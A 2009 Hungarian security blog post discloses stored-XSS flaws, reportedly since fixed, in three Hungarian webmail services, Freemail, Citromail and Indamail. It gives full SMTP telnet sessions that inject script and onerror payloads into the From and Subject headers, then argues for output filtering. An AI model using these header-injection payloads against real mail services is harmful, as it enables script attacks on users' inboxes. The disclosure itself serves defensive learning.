Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

A kimenetek szűréséről

2009.01.22. 16:35 | buherator | 4 komment

Kemény volt ez a hét, sajnos van mit van mit bepótolnom az elmúlt napokból. Elsőként darkelf felfedezéseit közölném, melyek igen jó táptalajt adtak volna egy országos XSS-féreg járvány kirobbanásához - szerencsére (elvileg) már javították őket.

A sebezhetőségek a nagy magyar webmail szolgáltatók krémét érintették, kihasználásukhoz mindössze egy telnet alkalmazásra, és az SMTP protokoll alapvető ismeretére volt szükség. 

Freemail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@freemail.hu>
DATA
From: "Egy ismeros <script>alert(1)</script>" <valaki@freemail.hu>
To: <cimzett@freemail.hu>
Subject: szia

Szoveg

.
QUIT

Citromail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@citromail.hu>
DATA
From: "Egy ismeros" <valaki@freemail.hu>
To: <cimzett@citromail.hu>
Subject: szia <img src="a" onError="alert(1);" />

Szoveg

.
QUIT

VIPmail/Indamail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@indamail.hu>
DATA
From: "Egy ismeros" <valaki@freemail.hu"<img src='' onerror='alert(1)' height='0' width='0'>
To: <cimzett@indamail.hu>
Subject: szia

Szoveg

.
QUIT

 

Az elmúlt évek során a hasonló rendszerek - a helyi esetekből és a külföldi példákból tanulva - rengeteget fejlődtek. A fenti példákból azonban az olvasható ki, hogy a fejlesztők feltételezték, csak az vehető ki a dobozból, amit ők gondos szűrések után behelyeztek oda. A helyzet azonban - ahogyan azt a példa is alátámasztja - nem mindig ilyen egyszerű: lehet hogy a bemeneti csatornák száma túlzottan nagy ahhoz, hogy minden érkező adatot ellenőrizzünk (akár teljesítmény okokból), de lehet hogy egyszerűen nincs lehetőségünk beavatkozni a bejövő adatfolyamba. 

A kimenetek szűrése ilyenkor legtöbb esetben egy huszárvágással megoldja a problémát. Ha nem akarjuk, hogy a felhasználóink potenciálisan veszélyes adatokat lássanak, ne mutassunk nekik ilyet! Azonban vigyázzunk: mindez nem akadályozza meg, hogy a programunk az elvárttól eltérő működést produkáljon egy váratlan adat hatására!

Címkék: gondolat vipmail freemail indamail az olvasó ír citromial

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

EQ · http://rycon.hu 2009.01.24. 14:39:32

pont ebből a 3cuccból lett az andreies balhé?

lacyc3 · http://www.lacyc3.eu 2009.01.24. 16:13:59

A freemail szimpla elvileg semmit sem hajt végre, az tényleg nagyon szimpla, érdemes lehet használni mert még gyors is :)

r@ek (törölt) 2009.01.25. 08:37:52

Vicces azert, hogy ezeket felevente ujra es ujra elohozza valaki, mintha o fedezte volna fel :-))

Darkelf.... Az B+...

Leragott csont...